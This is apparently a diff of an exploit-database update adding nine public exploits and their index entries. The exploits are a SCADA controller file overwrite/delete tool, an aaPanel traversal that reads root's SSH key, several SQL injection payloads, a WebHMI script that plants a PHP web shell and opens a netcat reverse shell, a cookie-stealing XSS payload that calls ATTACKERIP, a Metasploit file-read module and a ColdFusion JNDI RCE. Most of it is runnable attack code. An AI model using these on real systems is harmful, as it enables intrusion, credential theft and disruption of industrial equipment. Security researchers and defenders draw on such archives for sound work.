DB: 2022-02-24

9 changes to exploits/shellcodes

Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)
ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 - Remote File CRUD
Simple Real Estate Portal System 1.0 - 'id' SQLi
Air Cargo Management System v1.0 - SQLi
aaPanel 6.8.21 - Directory Traversal (Authenticated)
Student Record System 1.0 - 'cid' SQLi (Authenticated)
WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated)
WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated)
Microweber CMS 1.2.10 - Local File Inclusion (Authenticated) (Metasploit)

exploits/hardware/remote/50783.py

@@ -0,0 +1,175 @@
+# Exploit Title: CL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD
+# Exploit Author: LiquidWorm
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+#
+#
+# ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD
+#
+#
+# Vendor: Industrial Control Links, Inc.
+# Product web page: http://www.iclinks.com
+# Product datasheet: http://files.iclinks.com/datasheets/Scadaflex%20II/Scadaflex%20SC-1%20&%20SC-2_A1_compressed.pdf
+# Affected version: SW: 1.03.07 (build 317), WebLib: 1.24
+#                   SW: 1.02.20 (build 286), WebLib: 1.24
+#                   SW: 1.02.15 (build 286), WebLib: 1.22
+#                   SW: 1.02.01 (build 229), WebLib: 1.16
+#                   SW: 1.01.14 (build 172), WebLib: 1.14
+#                   SW: 1.01.01 (build 2149), WebLib: 1.13
+#
+#
+# Summary: Scadaflex II controllers are 100% web based
+# for both configuration and user interface. No applications
+# are required other than any standard web browser. They
+# are easily supported by remote access over the Internet
+# or a cellular link. Scadaflex II controllers support
+# industry standard wired communications using Modbus,
+# DF1, SNP, and Ethernet IP protocols along with Ethernet-Serial
+# bridging for Modbus or any other protocol. Each Scadaflex
+# II controller has both analog and digital, inputs and
+# outputs, sufficient for pumping stations, irrigation
+# controls, and other similar process monitoring and control
+# applications. They can also serve as communications
+# concentrators and protocol converters that enhance the
+# operation of existing PLCs and process equipment.
+#
+# Desc: The SCADA controller is vulnerable to unauthenticated
+# file write/overwrite and delete vulnerability. This allows
+# an attacker to execute critical file CRUD operations on the
+# device that can potentially allow system access and impact
+# availability.
+#
+# Tested on: SCADA HTTP Server
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2022-5698
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5698.php
+#
+# CVE ID: CVE-2022-25359
+# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25359
+#
+#
+# 06.11.2021
+#
+
+import time,sys
+import requests
+import datetime
+import showtime
+
+# Default
+# AES Encryption Key = 'ABCD1234abcd:ICL'
+
+def bann():
+    print('''
+----------------------------------------------------------
+          ) ) )                     ) ) )
+        ( ( (                      ( ( (
+      ) ) )                       ) ) )
+   (~~~~~~~~~)                 (~~~~~~~~~)
+    | t00t  |                   |  w00t |
+    |       |                   |       |
+    I      _._                  I       _._
+    I    /'   `\\                I     /'   `\\
+    I   |   M   |               I    |   J   |
+    f   |   |~~~~~~~~~~~~~~|    f    |    |~~~~~~~~~~~~~~|
+  .'    |   ||~~~~~~~~|    |  .'     |    | |~~~~~~~~|   |
+/'______|___||__###___|____|/'_______|____|_|__###___|___|
+
+             ScadaFlex II SCADA Controllers
+                Remote write/delete PoC
+                     ZSL-2022-5698
+----------------------------------------------------------
+        ''')
+
+def safe(*trigger, ):
+    return True # |-| Safety Switch
+
+def choice(n):
+    try:
+        if n == 1:
+            overwrite(controllerip = sys.argv[1], filepos = int(sys.argv[3], base = 10))
+        elif n == 2:
+            delete(controllerip = sys.argv[1], filepos = int(sys.argv[2], base = 10))
+        else:
+           print('Usage (Upload): ./sflex.py [IP] [Local file] [File position number]')
+           print('Usage (Delete): ./sflex.py [IP] [File position number]')
+           raise SystemExit('t00t')
+    except Exception as tip:
+        raise SystemExit(tip)
+
+def jump():
+    choice(1) if len(sys.argv) == 4 else next
+    choice(2) if len(sys.argv) == 3 else next
+
+def overwrite(controllerip, filepos):
+    print('Starting script at', start)
+    localfile = sys.argv[2]
+
+    with open(localfile, 'rb') as opener:
+        scadaurl  = 'http://'
+        scadaurl += controllerip
+        scadaurl += '/d.php?N'
+        scadaurl += str(filepos)
+        scadaurl += ',73,'
+        scadaurl += opener.name
+        scadaurl += '~'
+        scadaurl += str(int(time.time()))
+
+        see = requests.post(scadaurl, files = {'upload' : opener})
+
+        if '100' in see.text:
+            print('File uploaded in {} directory at position {}.'.format('l', filepos))
+            print('URL: http://' +controllerip+ '/l/' +localfile)
+        else:
+            print("- controller webserver error.")
+    exit()
+
+def delete(controllerip, filepos):
+    print('Starting script at', start)
+    exit(42) if isinstance(filepos, str) else next
+
+    scadaurl  = 'http://'
+    scadaurl += controllerip
+    scadaurl += '/rW12IcL_Dat_N'
+    scadaurl += str(filepos)
+    scadaurl += ',0=1~'
+    scadaurl += str(int(time.time()))
+
+    see = requests.get(scadaurl)
+
+    check  = '\x72\x57'  #|
+    check += '\x31\x32'  #|
+    check += '\x49\x63'  #|
+    check += '\x4c\x5f'  #|
+    check += '\x44\x61'  #|
+    check += '\x74\x5f'  #|
+    check += '\x4e'# o'  #|
+    check += str(filepos)#|
+    check += '\x2c\x30'  #|
+    check += '\x09\x52'  #|
+
+    if check in see.text:
+        print('File at position {} deleted.'.format(filepos))
+    else:
+    	print('- controller webserver error.')
+    exit()
+
+def main():
+    if safe(True):
+        print('Careful...\nSafety: ON')
+        exit(17)
+    else:
+        print('Safety: OFF', end = '')
+    global start
+    start = datetime.datetime.now()
+    start = start.strftime('%d.%m.%Y %H:%M:%S')
+    bann(), jump(), choice(1959)
+
+if __name__ == "__main__":
+    main()

exploits/linux/webapps/50780.txt

@@ -0,0 +1,40 @@
+# Exploit Title: aaPanel 6.8.21 - Directory Traversal (Authenticated)
+# Date: 22.02.2022
+# Exploit Author: Fikrat Ghuliev (Ghuliev)
+# Vendor Homepage: https://www.aapanel.com/
+# Software Link: https://www.aapanel.com
+# Version: 6.8.21
+# Tested on: Ubuntu
+
+Application vulnerable to Directory Traversal and attacker can get root user private ssh key(id_rsa)
+
+#Go to App Store
+
+#Click to "install" in any free plugin.
+
+#Change installation script to ../../../root/.ssh/id_rsa
+
+POST /ajax?action=get_lines HTTP/1.1
+Host: IP:7800
+Content-Length: 41
+Accept: */*
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82
+Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://IP:7800
+Referer: http://IP:7800/soft
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: aa0775f98350c5c13bfd21f2c6b8c288=d20c4937-e5ae-46fb-b8bd-fa7c290d805a.ohyRHdOIMj3DBfyddCRbL-rlKB0;
+request_token=nKLXa4RUXgwBHeWNyMH1MEDSkTaks9dWjQ7zzA0iRc7lrHwd;
+serverType=nginx; order=id%20desc; memSize=3889; vcodesum=13;
+page_number=20; backup_path=/www/backup; sites_path=/www/wwwroot;
+distribution=ubuntu; serial_no=; pro_end=-1; load_page=null;
+load_type=null; load_search=undefined; force=0; rank=list;
+Path=/www/wwwroot; bt_user_info=; default_dir_path=/www/wwwroot/;
+path_dir_change=/www/wwwroot/
+Connection: close
+
+num=10&filename=../../../root/.ssh/id_rsa

exploits/php/webapps/50778.txt

@@ -0,0 +1,28 @@
+# Exploit Title: Simple Real Estate Portal System 1.0 - 'id'  SQL Injection
+# Date: 22/02/2022
+# Exploit Author: Mosaaed
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html
+# Version: 1.0
+# Tested on: Linux mosaaed 5.5.0-1parrot1-amd64 #1 SMP Parrot 5.5.17-1parrot1 (2020-04-25) x86_64 GNU/Linux
+
+
+
+# Sqlmap command:
+
+sqlmap -u "http://localhost/reps/?p=view_estate&id=6"  --batch --dbs
+
+# Output:
+
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: p=view_estate&id=6' AND 9373=9373 AND 'CcAj'='CcAj
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: p=view_estate&id=6' AND (SELECT 4967 FROM (SELECT(SLEEP(5)))Lowr) AND 'iyVC'='iyVC
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 9 columns
+    Payload: p=view_estate&id=-3391' UNION ALL SELECT NULL,CONCAT(0x716b7a7a71,0x6a56556147504d795a536b566c7a4f5659677a65514c706758485a66484f464e5676496470695a41,0x7162767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

exploits/php/webapps/50779.txt

@@ -0,0 +1,33 @@
+# Title: Air Cargo Management System v1.0 - SQLi
+# Author: nu11secur1ty
+# Date: 02.18.2022
+# Vendor: https://www.sourcecodester.com/users/tips23
+# Software: https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html
+# Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/2022/Air-Cargo-Management-System
+
+# Description:
+The `ref_code` parameter from Air Cargo Management System v1.0 appears
+to be vulnerable to SQL injection attacks.
+The payload '+(select
+load_file('\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html\\hag'))+'
+was submitted in the ref_code parameter.
+This payload injects a SQL sub-query that calls MySQL's load_file
+function with a UNC file path that references a URL on an external
+domain.
+The application interacted with that domain, indicating that the
+injected SQL query was executed.
+WARNING: If this is in some external domain, or some subdomain
+redirection, or internal whatever, this will be extremely dangerous!
+Status: CRITICAL
+
+
+[+] Payloads:
+
+---
+Parameter: ref_code (GET)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: p=trace&ref_code=258044'+(select
+load_file('\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html\\hag'))+''
+AND (SELECT 9012 FROM (SELECT(SLEEP(3)))xEdD) AND 'JVki'='JVki
+---

exploits/php/webapps/50782.txt

@@ -0,0 +1,36 @@
+# Exploit Title: Student Record System 1.0 - 'cid' SQLi (Authenticated)
+# Exploit Author: Mohd. Anees
+# Contact: https://www.linkedin.com/in/aneessecure/
+# Software Homepage: https://phpgurukul.com/student-record-system-php/
+# Version : 1.0
+# Tested on: windows 10 xammp | Kali linux
+# Category: WebApp
+# Google Dork: N/A
+# Date: 22.02.2022
+######## Description ########
+#
+#
+#  Authenticate and edit course section where cid parameter will appear and put your payload at there it'll work
+#
+#  http://localhost/schoolmanagement/schoolmanagement/pages/edit-course.php?cid=-7%27%20union%20select%201,2,3,4,5--+
+#
+######## Proof of Concept ########
+
+========>>> REQUEST <<<=========
+
+GET /schoolmanagement/pages/edit-course.php?cid=-7%27%20union%20select%201,2,3,4,5--+ HTTP/1.1
+Host: localhost
+sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Windows"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: none
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: PHPSESSID=m1s7h9jremg0vj7ipkgf9m05n1nt
+Connection: close

exploits/php/webapps/50784.py

@@ -0,0 +1,106 @@
+# Exploit Title: WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated)
+# Date: 03/01/2022
+# Exploit Author: Antonio Cuomo (arkantolo)
+# Vendor Homepage: https://webhmi.com.ua/en/
+# Version: WebHMI 4.1.1.7662
+# Tested on: WebHMI-4.1.1.7662
+
+#!/usr/bin/python
+import sys
+import re
+import argparse
+import requests
+import time
+import subprocess
+
+print("\nWebHMI 4.1.1 - Remote Code Execution (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n")
+print("Level2 account must be enabled !\n");
+
+login = "admin"
+password = "admin"
+
+class Exploit:
+
+	def __init__(self, target_ip, target_port, localhost, localport):
+		self.target_ip = target_ip
+		self.target_port = target_port
+		self.localhost = localhost
+		self.localport = localport
+
+	def exploitation(self):
+		reverse = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f"""
+		payload = "<?php+system($_GET['c']);+?>"
+
+		headers_login = {
+		'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36',
+		'Accept': 'application/json, text/javascript, */*; q=0.01',
+		'Accept-Language': 'en-US,en;q=0.5',
+		'Accept-Encoding': 'gzip, deflate',
+		'Content-Type': 'application/json',
+		'X-WH-LOGIN': login,
+		'X-WH-PASSWORD': password,
+		'X-Requested-With': 'XMLHttpRequest',
+		'Connection': 'close',
+		'Content-Length': '0'
+		}
+
+		url = 'http://' + target_ip + ':' + target_port
+		r = requests.Session()
+
+		print('[*] Resolving URL...')
+		r1 = r.get(url)
+		time.sleep(3)
+
+		print('[*] Trying to log in...')
+		r2 = r.post(url + '/api/signin', headers=headers_login, allow_redirects=True)
+		time.sleep(3)
+
+		print('[*] Login redirection...')
+		login_cookies = {
+		'X-WH-SESSION-ID':r2.headers['X-WH-SESSION-ID'],
+		'X-WH-CHECK-TRIAL':'true',
+		'il18next':'en',
+		}
+		r3 = r.post(url + '/login.php?sid=' + r2.headers['X-WH-SESSION-ID'] + '&uid=1',cookies=login_cookies)
+		time.sleep(3)
+
+		print('[*] Bypassing basedir...')
+		for i in range(0, len(payload)):
+			#print(payload[i])
+			rp = r.get(url + '/setup/backup.php?sync=`echo%20-n%20"' + payload[i] + '">>cmd.php`', cookies=login_cookies)
+			time.sleep(0.2)
+
+		print('[*] Setting up listener...')
+		listener = subprocess.Popen(["nc", "-nlp", self.localport])
+		time.sleep(2)
+
+		print('[*] Executing payload...')
+		time.sleep(1)
+		print('[*] Waiting reverse shell...')
+		r4 = r.get(url + '/setup/cmd.php?c=`' + reverse + '`.bak', cookies=login_cookies)
+
+		if (r4.status_code == 200):
+			print('[*] Got shell!')
+			while True:
+				listener.wait()
+		else:
+			print('[-] Something went wrong!')
+			listener.terminate()
+
+def get_args():
+	parser = argparse.ArgumentParser(description='WebHMI 4.1.1 - Remote Code Execution (Authenticated)')
+	parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP')
+	parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')
+	parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP')
+	parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port')
+	args = parser.parse_args()
+	return args
+
+args = get_args()
+target_ip = args.url
+target_port = args.target_port
+localhost = args.localhost
+localport = args.localport
+
+exp = Exploit(target_ip, target_port, localhost, localport)
+exp.exploitation()

exploits/php/webapps/50785.txt

@@ -0,0 +1,30 @@
+# Exploit Title: WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated)
+# Date: 04/01/2022
+# Exploit Author: Antonio Cuomo (arkantolo)
+# Vendor Homepage: https://webhmi.com.ua/en/
+# Version: WebHMI Firmware 4.1.1.7662
+# Tested on: WebHMI Firmware 4.1.1.7662
+
+#Steps to Reproduce
+
+1. Login to admin account
+
+2. Add a new register or create new dashboard
+insert payload
+
+<script>var i=new Image;i.src="http://ATTACKERIP/?"+document.cookie;</script>
+
+in Title field and save.
+
+# Dashboard section impact instantly all logged users.
+
+#Listener log:
+GET /?PHPSESSID=acaa76374df7418e81460b4a625cb457;%20i18next=en;%20X-WH-SESSION-ID=8a5d6c60bdab0704f32e792bc1d36a6f HTTP/1.1
+Host: 192.168.0.169:8080
+Connection: keep-alive
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
+Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
+Sec-GPC: 1
+Referer: http://192.168.0.153/
+Accept-Encoding: gzip, deflate
+Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7

exploits/php/webapps/50786.rb

@@ -0,0 +1,245 @@
+# Exploit Title: Microweber CMS v1.2.10 Local File Inclusion (Authenticated)
+# Date: 22.02.2022
+# Exploit Author: Talha Karakumru <talhakarakumru[at]gmail.com>
+# Vendor Homepage: https://microweber.org/
+# Software Link: https://github.com/microweber/microweber/archive/refs/tags/v1.2.10.zip
+# Version: Microweber CMS v1.2.10
+# Tested on: Microweber CMS v1.2.10
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Microweber CMS v1.2.10 Local File Inclusion (Authenticated)',
+        'Description' => %q{
+          Microweber CMS v1.2.10 has a backup functionality. Upload and download endpoints can be combined to read any file from the filesystem.
+          Upload function may delete the local file if the web service user has access.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Talha Karakumru <talhakarakumru[at]gmail.com>'
+        ],
+        'References' => [
+          ['URL', 'https://huntr.dev/bounties/09218d3f-1f6a-48ae-981c-85e86ad5ed8b/']
+        ],
+        'Notes' => {
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ OS_RESOURCE_LOSS ]
+        },
+        'Targets' => [
+          [ 'Microweber v1.2.10', {} ]
+        ],
+        'Privileged' => true,
+        'DisclosureDate' => '2022-01-30'
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path for Microweber', '/']),
+        OptString.new('USERNAME', [true, 'The admin\'s username for Microweber']),
+        OptString.new('PASSWORD', [true, 'The admin\'s password for Microweber']),
+        OptString.new('LOCAL_FILE_PATH', [true, 'The path of the local file.']),
+        OptBool.new('DEFANGED_MODE', [true, 'Run in defanged mode', true])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'login')
+    })
+
+    if res.nil?
+      fail_with(Failure::Unreachable, 'Microweber CMS cannot be reached.')
+    end
+
+    print_status 'Checking if it\'s Microweber CMS.'
+
+    if res.code == 200 && !res.body.include?('Microweber')
+      print_error 'Microweber CMS has not been detected.'
+      Exploit::CheckCode::Safe
+    end
+
+    if res.code != 200
+      fail_with(Failure::Unknown, res.body)
+    end
+
+    print_good 'Microweber CMS has been detected.'
+
+    return check_version(res.body)
+  end
+
+  def check_version(res_body)
+    print_status 'Checking Microweber\'s version.'
+
+    begin
+      major, minor, build = res_body[/Version:\s+(\d+\.\d+\.\d+)/].gsub(/Version:\s+/, '').split('.')
+      version = Rex::Version.new("#{major}.#{minor}.#{build}")
+    rescue NoMethodError, TypeError
+      return Exploit::CheckCode::Safe
+    end
+
+    if version == Rex::Version.new('1.2.10')
+      print_good 'Microweber version ' + version.to_s
+      return Exploit::CheckCode::Appears
+    end
+
+    print_error 'Microweber version ' + version.to_s
+
+    if version < Rex::Version.new('1.2.10')
+      print_warning 'The versions that are older than 1.2.10 have not been tested. You can follow the exploitation steps of the official vulnerability report.'
+      return Exploit::CheckCode::Unknown
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def try_login
+    print_status 'Trying to log in.'
+    res = send_request_cgi({
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'uri' => normalize_uri(target_uri.path, 'api', 'user_login'),
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
+        'lang' => '',
+        'where_to' => 'admin_content'
+      }
+    })
+
+    if res.nil?
+      fail_with(Failure::Unreachable, 'Log in request failed.')
+    end
+
+    if res.code != 200
+      fail_with(Failure::Unknown, res.body)
+    end
+
+    json_res = res.get_json_document
+
+    if !json_res['error'].nil? && json_res['error'] == 'Wrong username or password.'
+      fail_with(Failure::BadConfig, 'Wrong username or password.')
+    end
+
+    if !json_res['success'].nil? && json_res['success'] == 'You are logged in'
+      print_good 'You are logged in.'
+      return
+    end
+
+    fail_with(Failure::Unknown, 'An unknown error occurred.')
+  end
+
+  def try_upload
+    print_status 'Uploading ' + datastore['LOCAL_FILE_PATH'] + ' to the backup folder.'
+
+    referer = ''
+    if !datastore['VHOST'].nil? && !datastore['VHOST'].empty?
+      referer = "http#{datastore['SSL'] ? 's' : ''}://#{datastore['VHOST']}/"
+    else
+      referer = full_uri
+    end
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api', 'BackupV2', 'upload'),
+      'vars_get' => {
+        'src' => datastore['LOCAL_FILE_PATH']
+      },
+      'headers' => {
+        'Referer' => referer
+      }
+    })
+
+    if res.nil?
+      fail_with(Failure::Unreachable, 'Upload request failed.')
+    end
+
+    if res.code != 200
+      fail_with(Failure::Unknown, res.body)
+    end
+
+    if res.headers['Content-Type'] == 'application/json'
+      json_res = res.get_json_document
+
+      if json_res['success']
+        print_good json_res['success']
+        return
+      end
+
+      fail_with(Failure::Unknown, res.body)
+    end
+
+    fail_with(Failure::BadConfig, 'Either the file cannot be read or the file does not exist.')
+  end
+
+  def try_download
+    filename = datastore['LOCAL_FILE_PATH'].include?('\\') ? datastore['LOCAL_FILE_PATH'].split('\\')[-1] : datastore['LOCAL_FILE_PATH'].split('/')[-1]
+    print_status 'Downloading ' + filename + ' from the backup folder.'
+
+    referer = ''
+    if !datastore['VHOST'].nil? && !datastore['VHOST'].empty?
+      referer = "http#{datastore['SSL'] ? 's' : ''}://#{datastore['VHOST']}/"
+    else
+      referer = full_uri
+    end
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api', 'BackupV2', 'download'),
+      'vars_get' => {
+        'filename' => filename
+      },
+      'headers' => {
+        'Referer' => referer
+      }
+    })
+
+    if res.nil?
+      fail_with(Failure::Unreachable, 'Download request failed.')
+    end
+
+    if res.code != 200
+      fail_with(Failure::Unknown, res.body)
+    end
+
+    if res.headers['Content-Type'] == 'application/json'
+      json_res = res.get_json_document
+
+      if json_res['error']
+        fail_with(Failure::Unknown, json_res['error'])
+        return
+      end
+    end
+
+    print_status res.body
+  end
+
+  def run
+    if datastore['DEFANGED_MODE']
+      warning = <<~EOF
+        Triggering this vulnerability may delete the local file if the web service user has the permission.
+        If you want to continue, disable the DEFANGED_MODE.
+        => set DEFANGED_MODE false
+      EOF
+
+      fail_with(Failure::BadConfig, warning)
+    end
+
+    try_login
+    try_upload
+    try_download
+  end
+end

exploits/windows/remote/50781.txt

@@ -0,0 +1,42 @@
+# Exploit Title: Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)
+# Google Dork: intext:"adobe coldfusion 11"
+# Date: 2022-22-02
+# Exploit Author: Amel BOUZIANE-LEBLOND (https://twitter.com/amellb)
+# Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html
+# Version: Adobe Coldfusion (11.0.03.292866)
+# Tested on: Microsoft Windows Server & Linux
+
+# Description:
+# ColdFusion allows an unauthenticated user to connect to any LDAP server. An attacker can exploit it to achieve remote code execution.
+# JNDI attack via the 'verifyldapserver' parameter on the utils.cfc
+
+==================== 1.Setup rogue-jndi Server ====================
+
+https://github.com/veracode-research/rogue-jndi
+
+
+==================== 2.Preparing the Attack =======================
+
+java -jar target/RogueJndi-1.1.jar --command "touch /tmp/owned" --hostname "attacker_box"
+
+==================== 3.Launch the Attack ==========================
+
+
+http://REDACTED/CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=LDAP_SERVER&vport=LDAP_PORT&vstart=&vusername=&vpassword=&returnformat=json
+
+
+curl -i -s -k -X $'GET' \
+    -H $'Host: target' \
+    --data-binary $'\x0d\x0a\x0d\x0a' \
+    $'http://REDACTED//CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=LDAP_SERVER&vport=LDAP_PORT&vstart=&vusername=&vpassword=&returnformat=json'
+
+
+==================== 4.RCE =======================================
+
+Depend on the target need to compile the rogue-jndi server with JAVA 7 or 8
+Can be done by modify the pom.xml as below
+
+<configuration>
+<source>7</source>
+<target>7</target>
+</configuration>

files_exploits.csv

@@ -18623,6 +18623,8 @@ id,file,description,date,author,type,platform,port
 50720,exploits/windows/remote/50720.py,"Wing FTP Server 4.3.8 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,notcos,remote,windows,
 50742,exploits/hardware/remote/50742.txt,"H3C SSL VPN - Username Enumeration",1970-01-01,LiquidWorm,remote,hardware,
 50290,exploits/multiple/remote/50290.as,"Adobe Flash Player - Integer Overflow",1970-01-01,ryujin,remote,multiple,
+50781,exploits/windows/remote/50781.txt,"Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)",1970-01-01,"Amel BOUZIANE-LEBLOND",remote,windows,
+50783,exploits/hardware/remote/50783.py,"ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 - Remote File CRUD",1970-01-01,LiquidWorm,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -44847,3 +44849,10 @@ id,file,description,date,author,type,platform,port
 50772,exploits/php/webapps/50772.py,"WordPress Plugin WP User Frontend 3.5.25 - SQLi (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
 50774,exploits/php/webapps/50774.txt,"FileCloud 21.2 - Cross-Site Request Forgery (CSRF)",1970-01-01,"Masashi Fujiwara",webapps,php,
 50775,exploits/hardware/webapps/50775.txt,"Dbltek GoIP - Local File Inclusion",1970-01-01,"Valtteri Lehtinen",webapps,hardware,
+50778,exploits/php/webapps/50778.txt,"Simple Real Estate Portal System 1.0 - 'id' SQLi",1970-01-01,Mosaaed,webapps,php,
+50779,exploits/php/webapps/50779.txt,"Air Cargo Management System v1.0 - SQLi",1970-01-01,nu11secur1ty,webapps,php,
+50780,exploits/linux/webapps/50780.txt,"aaPanel 6.8.21 - Directory Traversal (Authenticated)",1970-01-01,Ghuliev,webapps,linux,
+50782,exploits/php/webapps/50782.txt,"Student Record System 1.0 - 'cid' SQLi (Authenticated)",1970-01-01,"Mohd. Anees",webapps,php,
+50784,exploits/php/webapps/50784.py,"WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Antonio Cuomo",webapps,php,
+50785,exploits/php/webapps/50785.txt,"WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Antonio Cuomo",webapps,php,
+50786,exploits/php/webapps/50786.rb,"Microweber CMS 1.2.10 - Local File Inclusion (Authenticated) (Metasploit)",1970-01-01,"Talha Karakumru",webapps,php,